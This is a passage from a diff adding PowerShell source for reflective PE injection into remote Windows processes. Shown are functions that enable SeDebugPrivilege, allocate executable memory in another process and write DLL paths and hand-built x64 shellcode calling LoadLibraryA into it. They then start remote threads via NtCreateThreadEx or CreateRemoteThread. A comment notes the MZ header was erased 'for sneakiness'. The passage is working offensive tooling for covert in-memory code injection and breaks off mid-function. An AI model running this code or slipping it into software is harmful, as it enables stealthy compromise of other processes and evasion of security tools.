+ $Value #We will determine the type dynamically
915
+ )
916
+
917
+ $ValueSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2
918
+ $Hex = "0x{0:X$($ValueSize)}" -f [Int64]$Value #Passing a IntPtr to this doesn't work well. Cast to Int64 first.
919
+
920
+ return $Hex
921
+ }
922
+
923
+
924
+ Function Test-MemoryRangeValid
925
+ {
926
+ Param(
927
+ [Parameter(Position = 0, Mandatory = $true)]
928
+ [String]
929
+ $DebugString,
930
+
931
+ [Parameter(Position = 1, Mandatory = $true)]
932
+ [System.Object]
933
+ $PEInfo,
934
+
935
+ [Parameter(Position = 2, Mandatory = $true)]
936
+ [IntPtr]
937
+ $StartAddress,
938
+
939
+ [Parameter(ParameterSetName = "EndAddress", Position = 3, Mandatory = $true)]
940
+ [IntPtr]
941
+ $EndAddress,
942
+
943
+ [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
944
+ [IntPtr]
945
+ $Size
946
+ )
947
+
948
+ [IntPtr]$FinalEndAddress = [IntPtr]::Zero
949
+ if ($Size)
950
+ {
951
+ [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
952
+ }
953
+ else
954
+ {
955
+ $FinalEndAddress = $EndAddress
956
+ }
957
+
958
+ $PEEndAddress = $PEInfo.EndAddress
959
+
960
+ if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
961
+ {
962
+ Throw "Trying to write to memory smaller than allocated address range. $DebugString"
963
+ }
964
+ if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
965
+ {
966
+ Throw "Trying to write to memory greater than allocated address range. $DebugString"
967
+ }
968
+ }
969
+
970
+
971
+ Function Write-BytesToMemory
972
+ {
973
+ Param(
974
+ [Parameter(Position=0, Mandatory = $true)]
975
+ [Byte[]]
976
+ $Bytes,
977
+
978
+ [Parameter(Position=1, Mandatory = $true)]
979
+ [IntPtr]
980
+ $MemoryAddress
981
+ )
982
+
983
+ for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
984
+ {
985
+ [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
986
+ }
987
+ }
988
+
989
+
990
+ #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
991
+ Function Get-DelegateType
992
+ {
993
+ Param
994
+ (
995
+ [OutputType([Type])]
996
+
997
+ [Parameter( Position = 0)]
998
+ [Type[]]
999
+ $Parameters = (New-Object Type[](0)),
1000
+
1001
+ [Parameter( Position = 1 )]
1002
+ [Type]
1003
+ $ReturnType = [Void]
1004
+ )
1005
+
1006
+ $Domain = [AppDomain]::CurrentDomain
1007
+ $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
1008
+ $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
1009
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
1010
+ $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
1011
+ $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
1012
+ $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
1013
+ $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
1014
+ $MethodBuilder.SetImplementationFlags('Runtime, Managed')
1015
+
1016
+ Write-Output $TypeBuilder.CreateType()
1017
+ }
1018
+
1019
+
1020
+ #Function written by Matt Graeber, Twitter: @mattifestation, Blog: http://www.exploit-monday.com/
1021
+ Function Get-ProcAddress
1022
+ {
1023
+ Param
1024
+ (
1025
+ [OutputType([IntPtr])]
1026
+
1027
+ [Parameter( Position = 0, Mandatory = $True )]
1028
+ [String]
1029
+ $Module,
1030
+
1031
+ [Parameter( Position = 1, Mandatory = $True )]
1032
+ [String]
1033
+ $Procedure
1034
+ )
1035
+
1036
+ # Get a reference to System.dll in the GAC
1037
+ $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() |
1038
+ Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }
1039
+ $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
1040
+ # Get a reference to the GetModuleHandle and GetProcAddress methods
1041
+ $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
1042
+ $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
1043
+ # Get a handle to the module specified
1044
+ $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
1045
+ $tmpPtr = New-Object IntPtr
1046
+ $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)
1047
+
1048
+ # Return the address of the function
1049
+ Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))
1050
+ }
1051
+
1052
+
1053
+ Function Enable-SeDebugPrivilege
1054
+ {
1055
+ Param(
1056
+ [Parameter(Position = 1, Mandatory = $true)]
1057
+ [System.Object]
1058
+ $Win32Functions,
1059
+
1060
+ [Parameter(Position = 2, Mandatory = $true)]
1061
+ [System.Object]
1062
+ $Win32Types,
1063
+
1064
+ [Parameter(Position = 3, Mandatory = $true)]
1065
+ [System.Object]
1066
+ $Win32Constants
1067
+ )
1068
+
1069
+ [IntPtr]$ThreadHandle = $Win32Functions.GetCurrentThread.Invoke()
1070
+ if ($ThreadHandle -eq [IntPtr]::Zero)
1071
+ {
1072
+ Throw "Unable to get the handle to the current thread"
1073
+ }
1074
+
1075
+ [IntPtr]$ThreadToken = [IntPtr]::Zero
1076
+ [Bool]$Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
1077
+ if ($Result -eq $false)
1078
+ {
1079
+ $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
1080
+ if ($ErrorCode -eq $Win32Constants.ERROR_NO_TOKEN)
1081
+ {
1082
+ $Result = $Win32Functions.ImpersonateSelf.Invoke(3)
1083
+ if ($Result -eq $false)
1084
+ {
1085
+ Throw "Unable to impersonate self"
1086
+ }
1087
+
1088
+ $Result = $Win32Functions.OpenThreadToken.Invoke($ThreadHandle, $Win32Constants.TOKEN_QUERY -bor $Win32Constants.TOKEN_ADJUST_PRIVILEGES, $false, [Ref]$ThreadToken)
1089
+ if ($Result -eq $false)
1090
+ {
1091
+ Throw "Unable to OpenThreadToken."
1092
+ }
1093
+ }
1094
+ else
1095
+ {
1096
+ Throw "Unable to OpenThreadToken. Error code: $ErrorCode"
1097
+ }
1098
+ }
1099
+
1100
+ [IntPtr]$PLuid = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.LUID))
1101
+ $Result = $Win32Functions.LookupPrivilegeValue.Invoke($null, "SeDebugPrivilege", $PLuid)
1102
+ if ($Result -eq $false)
1103
+ {
1104
+ Throw "Unable to call LookupPrivilegeValue"
1105
+ }
1106
+
1107
+ [UInt32]$TokenPrivSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.TOKEN_PRIVILEGES)
1108
+ [IntPtr]$TokenPrivilegesMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($TokenPrivSize)
1109
+ $TokenPrivileges = [System.Runtime.InteropServices.Marshal]::PtrToStructure($TokenPrivilegesMem, [Type]$Win32Types.TOKEN_PRIVILEGES)
1110
+ $TokenPrivileges.PrivilegeCount = 1
1111
+ $TokenPrivileges.Privileges.Luid = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PLuid, [Type]$Win32Types.LUID)
1112
+ $TokenPrivileges.Privileges.Attributes = $Win32Constants.SE_PRIVILEGE_ENABLED
1113
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($TokenPrivileges, $TokenPrivilegesMem, $true)
1114
+
1115
+ $Result = $Win32Functions.AdjustTokenPrivileges.Invoke($ThreadToken, $false, $TokenPrivilegesMem, $TokenPrivSize, [IntPtr]::Zero, [IntPtr]::Zero)
1116
+ $ErrorCode = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error() #Need this to get success value or failure value
1117
+ if (($Result -eq $false) -or ($ErrorCode -ne 0))
1118
+ {
1119
+ #Throw "Unable to call AdjustTokenPrivileges. Return value: $Result, Errorcode: $ErrorCode" #todo need to detect if already set
1120
+ }
1121
+
1122
+ [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
1123
+ }
1124
+
1125
+
1126
+ Function Create-RemoteThread
1127
+ {
1128
+ Param(
1129
+ [Parameter(Position = 1, Mandatory = $true)]
1130
+ [IntPtr]
1131
+ $ProcessHandle,
1132
+
1133
+ [Parameter(Position = 2, Mandatory = $true)]
1134
+ [IntPtr]
1135
+ $StartAddress,
1136
+
1137
+ [Parameter(Position = 3, Mandatory = $false)]
1138
+ [IntPtr]
1139
+ $ArgumentPtr = [IntPtr]::Zero,
1140
+
1141
+ [Parameter(Position = 4, Mandatory = $true)]
1142
+ [System.Object]
1143
+ $Win32Functions
1144
+ )
1145
+
1146
+ [IntPtr]$RemoteThreadHandle = [IntPtr]::Zero
1147
+
1148
+ $OSVersion = [Environment]::OSVersion.Version
1149
+ #Vista and Win7
1150
+ if (($OSVersion -ge (New-Object 'Version' 6,0)) -and ($OSVersion -lt (New-Object 'Version' 6,2)))
1151
+ {
1152
+ #Write-Verbose "Windows Vista/7 detected, using NtCreateThreadEx. Address of thread: $StartAddress"
1153
+ $RetVal= $Win32Functions.NtCreateThreadEx.Invoke([Ref]$RemoteThreadHandle, 0x1FFFFF, [IntPtr]::Zero, $ProcessHandle, $StartAddress, $ArgumentPtr, $false, 0, 0xffff, 0xffff, [IntPtr]::Zero)
1154
+ $LastError = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()
1155
+ if ($RemoteThreadHandle -eq [IntPtr]::Zero)
1156
+ {
1157
+ Throw "Error in NtCreateThreadEx. Return value: $RetVal. LastError: $LastError"
1158
+ }
1159
+ }
1160
+ #XP/Win8
1161
+ else
1162
+ {
1163
+ #Write-Verbose "Windows XP/8 detected, using CreateRemoteThread. Address of thread: $StartAddress"
1164
+ $RemoteThreadHandle = $Win32Functions.CreateRemoteThread.Invoke($ProcessHandle, [IntPtr]::Zero, [UIntPtr][UInt64]0xFFFF, $StartAddress, $ArgumentPtr, 0, [IntPtr]::Zero)
1165
+ }
1166
+
1167
+ if ($RemoteThreadHandle -eq [IntPtr]::Zero)
1168
+ {
1169
+ Write-Error "Error creating remote thread, thread handle is null" -ErrorAction Stop
1170
+ }
1171
+
1172
+ return $RemoteThreadHandle
1173
+ }
1174
+
1175
+
1176
+
1177
+ Function Get-ImageNtHeaders
1178
+ {
1179
+ Param(
1180
+ [Parameter(Position = 0, Mandatory = $true)]
1181
+ [IntPtr]
1182
+ $PEHandle,
1183
+
1184
+ [Parameter(Position = 1, Mandatory = $true)]
1185
+ [System.Object]
1186
+ $Win32Types
1187
+ )
1188
+
1189
+ $NtHeadersInfo = New-Object System.Object
1190
+
1191
+ #Normally would validate DOSHeader here, but we did it before this function was called and then destroyed 'MZ' for sneakiness
1192
+ $dosHeader = [System.Runtime.InteropServices.Marshal]::PtrToStructure($PEHandle, [Type]$Win32Types.IMAGE_DOS_HEADER)
1193
+
1194
+ #Get IMAGE_NT_HEADERS
1195
+ [IntPtr]$NtHeadersPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEHandle) ([Int64][UInt64]$dosHeader.e_lfanew))
1196
+ $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value $NtHeadersPtr
1197
+ $imageNtHeaders64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS64)
1198
+
1199
+ #Make sure the IMAGE_NT_HEADERS checks out. If it doesn't, the data structure is invalid. This should never happen.
1200
+ if ($imageNtHeaders64.Signature -ne 0x00004550)
1201
+ {
1202
+ throw "Invalid IMAGE_NT_HEADER signature."
1203
+ }
1204
+
1205
+ if ($imageNtHeaders64.OptionalHeader.Magic -eq 'IMAGE_NT_OPTIONAL_HDR64_MAGIC')
1206
+ {
1207
+ $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders64
1208
+ $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $true
1209
+ }
1210
+ else
1211
+ {
1212
+ $ImageNtHeaders32 = [System.Runtime.InteropServices.Marshal]::PtrToStructure($NtHeadersPtr, [Type]$Win32Types.IMAGE_NT_HEADERS32)
1213
+ $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value $imageNtHeaders32
1214
+ $NtHeadersInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value $false
1215
+ }
1216
+
1217
+ return $NtHeadersInfo
1218
+ }
1219
+
1220
+
1221
+ #This function will get the information needed to allocated space in memory for the PE
1222
+ Function Get-PEBasicInfo
1223
+ {
1224
+ Param(
1225
+ [Parameter( Position = 0, Mandatory = $true )]
1226
+ [Byte[]]
1227
+ $PEBytes,
1228
+
1229
+ [Parameter(Position = 1, Mandatory = $true)]
1230
+ [System.Object]
1231
+ $Win32Types
1232
+ )
1233
+
1234
+ $PEInfo = New-Object System.Object
1235
+
1236
+ #Write the PE to memory temporarily so I can get information from it. This is not it's final resting spot.
1237
+ [IntPtr]$UnmanagedPEBytes = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PEBytes.Length)
1238
+ [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $UnmanagedPEBytes, $PEBytes.Length) | Out-Null
1239
+
1240
+ #Get NtHeadersInfo
1241
+ $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $UnmanagedPEBytes -Win32Types $Win32Types
1242
+
1243
+ #Build a structure with the information which will be needed for allocating memory and writing the PE to memory
1244
+ $PEInfo | Add-Member -MemberType NoteProperty -Name 'PE64Bit' -Value ($NtHeadersInfo.PE64Bit)
1245
+ $PEInfo | Add-Member -MemberType NoteProperty -Name 'OriginalImageBase' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.ImageBase)
1246
+ $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
1247
+ $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfHeaders' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfHeaders)
1248
+ $PEInfo | Add-Member -MemberType NoteProperty -Name 'DllCharacteristics' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.DllCharacteristics)
1249
+
1250
+ #Free the memory allocated above, this isn't where we allocate the PE to memory
1251
+ [System.Runtime.InteropServices.Marshal]::FreeHGlobal($UnmanagedPEBytes)
1252
+
1253
+ return $PEInfo
1254
+ }
1255
+
1256
+
1257
+ #PEInfo must contain the following NoteProperties:
1258
+ # PEHandle: An IntPtr to the address the PE is loaded to in memory
1259
+ Function Get-PEDetailedInfo
1260
+ {
1261
+ Param(
1262
+ [Parameter( Position = 0, Mandatory = $true)]
1263
+ [IntPtr]
1264
+ $PEHandle,
1265
+
1266
+ [Parameter(Position = 1, Mandatory = $true)]
1267
+ [System.Object]
1268
+ $Win32Types,
1269
+
1270
+ [Parameter(Position = 2, Mandatory = $true)]
1271
+ [System.Object]
1272
+ $Win32Constants
1273
+ )
1274
+
1275
+ if ($PEHandle -eq $null -or $PEHandle -eq [IntPtr]::Zero)
1276
+ {
1277
+ throw 'PEHandle is null or IntPtr.Zero'
1278
+ }
1279
+
1280
+ $PEInfo = New-Object System.Object
1281
+
1282
+ #Get NtHeaders information
1283
+ $NtHeadersInfo = Get-ImageNtHeaders -PEHandle $PEHandle -Win32Types $Win32Types
1284
+
1285
+ #Build the PEInfo object
1286
+ $PEInfo | Add-Member -MemberType NoteProperty -Name PEHandle -Value $PEHandle
1287
+ $PEInfo | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS -Value ($NtHeadersInfo.IMAGE_NT_HEADERS)
1288
+ $PEInfo | Add-Member -MemberType NoteProperty -Name NtHeadersPtr -Value ($NtHeadersInfo.NtHeadersPtr)
1289
+ $PEInfo | Add-Member -MemberType NoteProperty -Name PE64Bit -Value ($NtHeadersInfo.PE64Bit)
1290
+ $PEInfo | Add-Member -MemberType NoteProperty -Name 'SizeOfImage' -Value ($NtHeadersInfo.IMAGE_NT_HEADERS.OptionalHeader.SizeOfImage)
1291
+
1292
+ if ($PEInfo.PE64Bit -eq $true)
1293
+ {
1294
+ [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS64)))
1295
+ $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
1296
+ }
1297
+ else
1298
+ {
1299
+ [IntPtr]$SectionHeaderPtr = [IntPtr](Add-SignedIntAsUnsigned ([Int64]$PEInfo.NtHeadersPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_NT_HEADERS32)))
1300
+ $PEInfo | Add-Member -MemberType NoteProperty -Name SectionHeaderPtr -Value $SectionHeaderPtr
1301
+ }
1302
+
1303
+ if (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_DLL) -eq $Win32Constants.IMAGE_FILE_DLL)
1304
+ {
1305
+ $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'DLL'
1306
+ }
1307
+ elseif (($NtHeadersInfo.IMAGE_NT_HEADERS.FileHeader.Characteristics -band $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE) -eq $Win32Constants.IMAGE_FILE_EXECUTABLE_IMAGE)
1308
+ {
1309
+ $PEInfo | Add-Member -MemberType NoteProperty -Name FileType -Value 'EXE'
1310
+ }
1311
+ else
1312
+ {
1313
+ Throw "PE file is not an EXE or DLL"
1314
+ }
1315
+
1316
+ return $PEInfo
1317
+ }
1318
+
1319
+
1320
+ Function Import-DllInRemoteProcess
1321
+ {
1322
+ Param(
1323
+ [Parameter(Position=0, Mandatory=$true)]
1324
+ [IntPtr]
1325
+ $RemoteProcHandle,
1326
+
1327
+ [Parameter(Position=1, Mandatory=$true)]
1328
+ [IntPtr]
1329
+ $ImportDllPathPtr
1330
+ )
1331
+
1332
+ $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
1333
+
1334
+ $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ImportDllPathPtr)
1335
+ $DllPathSize = [UIntPtr][UInt64]([UInt64]$ImportDllPath.Length + 1)
1336
+ $RImportDllPathPtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
1337
+ if ($RImportDllPathPtr -eq [IntPtr]::Zero)
1338
+ {
1339
+ Throw "Unable to allocate memory in the remote process"
1340
+ }
1341
+
1342
+ [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
1343
+ $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RImportDllPathPtr, $ImportDllPathPtr, $DllPathSize, [Ref]$NumBytesWritten)
1344
+
1345
+ if ($Success -eq $false)
1346
+ {
1347
+ Throw "Unable to write DLL path to remote process memory"
1348
+ }
1349
+ if ($DllPathSize -ne $NumBytesWritten)
1350
+ {
1351
+ Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
1352
+ }
1353
+
1354
+ $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
1355
+ $LoadLibraryAAddr = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, "LoadLibraryA") #Kernel32 loaded to the same address for all processes
1356
+
1357
+ [IntPtr]$DllAddress = [IntPtr]::Zero
1358
+ #For 64bit DLL's, we can't use just CreateRemoteThread to call LoadLibrary because GetExitCodeThread will only give back a 32bit value, but we need a 64bit address
1359
+ # Instead, write shellcode while calls LoadLibrary and writes the result to a memory address we specify. Then read from that memory once the thread finishes.
1360
+ if ($PEInfo.PE64Bit -eq $true)
1361
+ {
1362
+ #Allocate memory for the address returned by LoadLibraryA
1363
+ $LoadLibraryARetMem = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $DllPathSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
1364
+ if ($LoadLibraryARetMem -eq [IntPtr]::Zero)
1365
+ {
1366
+ Throw "Unable to allocate memory in the remote process for the return value of LoadLibraryA"
1367
+ }
1368
+
1369
+
1370
+ #Write Shellcode to the remote process which will call LoadLibraryA (Shellcode: LoadLibraryA.asm)
1371
+ $LoadLibrarySC1 = @(0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9)
1372
+ $LoadLibrarySC2 = @(0x48, 0xba)
1373
+ $LoadLibrarySC3 = @(0xff, 0xd2, 0x48, 0xba)
1374
+ $LoadLibrarySC4 = @(0x48, 0x89, 0x02, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
1375
+
1376
+ $SCLength = $LoadLibrarySC1.Length + $LoadLibrarySC2.Length + $LoadLibrarySC3.Length + $LoadLibrarySC4.Length + ($PtrSize * 3)
1377
+ $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
1378
+ $SCPSMemOriginal = $SCPSMem
1379
+
1380
+ Write-BytesToMemory -Bytes $LoadLibrarySC1 -MemoryAddress $SCPSMem
1381
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC1.Length)
1382
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($RImportDllPathPtr, $SCPSMem, $false)
1383
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1384
+ Write-BytesToMemory -Bytes $LoadLibrarySC2 -MemoryAddress $SCPSMem
1385
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC2.Length)
1386
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryAAddr, $SCPSMem, $false)
1387
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1388
+ Write-BytesToMemory -Bytes $LoadLibrarySC3 -MemoryAddress $SCPSMem
1389
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC3.Length)
1390
+ [System.Runtime.InteropServices.Marshal]::StructureToPtr($LoadLibraryARetMem, $SCPSMem, $false)
1391
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
1392
+ Write-BytesToMemory -Bytes $LoadLibrarySC4 -MemoryAddress $SCPSMem
1393
+ $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($LoadLibrarySC4.Length)
1394
+
1395
+
1396
+ $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
1397
+ if ($RSCAddr -eq [IntPtr]::Zero)
1398
+ {
1399
+ Throw "Unable to allocate memory in the remote process for shellcode"
1400
+ }
1401
+
1402
+ $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
1403
+ if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
1404
+ {
1405
+ Throw "Unable to write shellcode to remote process memory."
1406
+ }
1407
+
1408
+ $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
1409
+ $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
1410
+ if ($Result -ne 0)
1411
+ {
1412
+ Throw "Call to CreateRemoteThread to call GetProcAddress failed."
1413
+ }
1414
+
1415
+ #The shellcode writes the DLL address to memory in the remote process at address $LoadLibraryARetMem, read this memory
1416
+ [IntPtr]$ReturnValMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($PtrSize)
1417
+ $Result = $Win32Functions.ReadProcessMemory.Invoke($RemoteProcHandle, $LoadLibraryARetMem, $ReturnValMem, [UIntPtr][UInt64]$PtrSize, [Ref]$NumBytesWritten)
1418
+ if ($Result -eq $false)
1419
+ {
1420
+ Throw "Call to ReadProcessMemory failed"
1421
+ }
1422
+ [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
1423
+
1424
+ $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $LoadLibraryARetMem, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1425
+ $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1426
+ }
1427
+ else
1428
+ {
1429
+ [IntPtr]$RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $LoadLibraryAAddr -ArgumentPtr $RImportDllPathPtr -Win32Functions $Win32Functions
1430
+ $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
1431
+ if ($Result -ne 0)
1432
+ {
1433
+ Throw "Call to CreateRemoteThread to call GetProcAddress failed."
1434
+ }
1435
+
1436
+ [Int32]$ExitCode = 0
1437
+ $Result = $Win32Functions.GetExitCodeThread.Invoke($RThreadHandle, [Ref]$ExitCode)
1438
+ if (($Result -eq 0) -or ($ExitCode -eq 0))
1439
+ {
1440
+ Throw "Call to GetExitCodeThread failed"
1441
+ }
1442
+
1443
+ [IntPtr]$DllAddress = [IntPtr]$ExitCode
1444
+ }
1445
+
1446
+ $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RImportDllPathPtr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
1447
+
1448
+ return $DllAddress
1449
+ }
1450
+
1451
+
1452
+ Function Get-RemoteProcAddress
1453
+ {
1454
+ Param(
1455
+ [Parameter(Position=0, Mandatory=$true)]
1456
+ [IntPtr]
1457
+ $RemoteProcHandle,
1458
+
1459
+ [Parameter(Position=1, Mandatory=$true)]
1460
+ [IntPtr]
1461
+ $RemoteDllHandle,
1462
+
1463
+ [Parameter(Position=2, Mandatory=$true)]
1464
+ [IntPtr]
1465
+ $FunctionNamePtr,#This can either be a ptr to a string which is the function name, or, if LoadByOrdinal is 'true' this is an ordinal number (points to nothing)
1466
+
1467
+ [Parameter(Position=3, Mandatory=$true)]
1468
+ [Bool]
1469
+ $LoadByOrdinal
1470
+ )
1471
+
1472
+ $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])
1473
+
1474
+ [IntPtr]$RFuncNamePtr = [IntPtr]::Zero #Pointer to the function name in remote process memory if loading by function name, ordinal number if loading by ordinal
1475
+ #If not loading by ordinal, write the function name to the remote process memory
1476
+ if (-not $LoadByOrdinal)
1477
+ {
1478
+ $FunctionName = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($FunctionNamePtr)
1479
+
1480
+ #Write FunctionName to memory (will be used in GetProcAddress)
1481
+ $FunctionNameSize = [UIntPtr][UInt64]([UInt64]$FunctionName.Length + 1)
1482
+ $RFuncNamePtr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, $FunctionNameSize, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)
1483
+ if ($RFuncNamePtr -eq [IntPtr]::Zero)
1484
+ {
1485
+ Throw "Unable to allocate memory in the remote process"
1486
+ }
1487
+
1488
+ [UIntPtr]$NumBytesWritten = [UIntPtr]::Zero
1489
+ $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RFuncNamePtr, $FunctionNamePtr, $FunctionNameSize, [Ref]$NumBytesWritten)
1490
+ if ($Success -eq $false)
1491
+ {
1492
+ Throw "Unable to write DLL path to remote process memory"
1493
+ }
1494
+ if ($FunctionNameSize -ne $NumBytesWritten)
1495
+ {
1496
+ Throw "Didn't write the expected amount of bytes when writing a DLL path to load to the remote process"
1497
+ }
1498
+ }
1499
+ #If loading by ordinal, just set RFuncNamePtr to be the ordinal number
1500
+ else
1501
+ {
1502
+ $RFuncNamePtr = $FunctionNamePtr
1503
+ }
1504
+
1505
+ #Get address of GetProcAddress
1506
+ $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke("kernel32.dll")
1507
